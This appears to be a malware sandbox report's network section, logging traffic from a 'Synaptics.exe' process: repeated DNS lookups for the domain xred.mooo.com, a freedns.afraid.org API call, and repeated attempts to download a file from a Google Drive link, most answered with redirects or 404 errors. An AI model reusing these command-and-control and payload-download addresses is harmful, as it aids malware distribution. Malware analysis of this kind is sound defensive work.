                                                                                                                                      Dec 30, 2024 11:23:05.816103935 CET1.1.1.1192.168.2.50x81fNo error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:11.479224920 CET1.1.1.1192.168.2.50x67f8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:18.295396090 CET1.1.1.1192.168.2.50x48dfName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:25.196072102 CET1.1.1.1192.168.2.50x5c84Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:32.146699905 CET1.1.1.1192.168.2.50xd11Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:36.894064903 CET1.1.1.1192.168.2.50x511aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:42.570154905 CET1.1.1.1192.168.2.50x9848Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • docs.google.com
                                                                                                                                      • drive.usercontent.google.com
                                                                                                                                      • freedns.afraid.org

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.54971269.42.215.252806192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Dec 30, 2024 11:23:05.213248014 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                      User-Agent: MyApp
                                                                                                                                      Host: freedns.afraid.org
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Dec 30, 2024 11:23:05.800957918 CET243INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:05 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      X-Cache: MISS
                                                                                                                                      Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.549709142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:05 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:05 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-K7WbdvSNYF-OWqU5pOrrvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.549710142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:05 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:05 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:05 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-y1_iuoLVJJFohtHV8ts_tQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.549714142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:06 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:06 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Csj1iQdV5HhLxFWhs5nSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.549716142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:06 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-12-30 10:23:06 UTC1602INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5LW8KWFdf7WMzgVOKWjf4IF7bNdIVOTWuexsLEbEaKfG80j5InKOJtoOk2-WuWZ0K5Drig-y8
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:06 GMT
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-EVdNpbwuN1QWJcBMFv02Hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Set-Cookie: NID=520=ZX-DgLx8DKxqDSlyJFwMa40N-uOHIM4QJVTA_CoSWoPbU-m3uXi8BgemBWWBptEBpCCT7Rgt7WkVLTuyzu5xzaI92UcZ3ld7qutOfbNbCY3XbsR2udSNwxhnxf5MnRl8K4aUcSMKwK1fp9TXjgLnLD_puVz1kdUtxl9BQgyVE9NwVV9H-M0ZuQ8-; expires=Tue, 01-Jul-2025 10:23:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:06 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 32 45 66 58 6c 79 36 68 43 45 6e 31 50 74 68 77 71 35 79 64 38 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2EfXly6hCEn1Pthwq5yd8Q">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                      2024-12-30 10:23:06 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      4192.168.2.549718142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:06 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:06 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:06 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce--6KTBPOCbcaTqpJuWr_cIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      5192.168.2.549717142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:06 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-12-30 10:23:06 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5cqaWD6d3q0rH-Yt_a05ogvdWVub7xbkK1pfZGrJjOX76v1U7RxU25f4gUBPtk0hbk
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:06 GMT
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-utEZa2iZsmkq8k0AkcQ0kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Set-Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4; expires=Tue, 01-Jul-2025 10:23:06 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:06 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 62 75 61 6d 62 78 6c 38 4c 53 4f 54 4a 55 44 4f 2d 45 51 56 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="buambxl8LSOTJUDO-EQVlQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                      2024-12-30 10:23:06 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.549720142.250.186.1104436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      2024-12-30 10:23:07 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:07 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RvEsiuMkGnHmgvtk4LG0XQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.549721142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:07 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2024-12-30 10:23:07 UTC1602INHTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC4MUBlZl7tlL72SC1mwTP1RtQhE6wrODIp8x7IMwH872yfWmZjz1P-0a7bsgijVze9_q8Zv1jM
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:07 GMT
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LmRmpc2s4cIEWb7eFbGWWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Set-Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB; expires=Tue, 01-Jul-2025 10:23:07 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:07 UTC1602INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 42 41 56 4e 6e 75 56 44 4e 36 38 5f 71 63 37 6b 38 58 4f 38 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1BAVNnuVDN68_qc7k8XO8g">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                      2024-12-30 10:23:07 UTC50INData Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                      Data Ascii: is server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.549723142.250.186.334436192C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 10:23:07 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
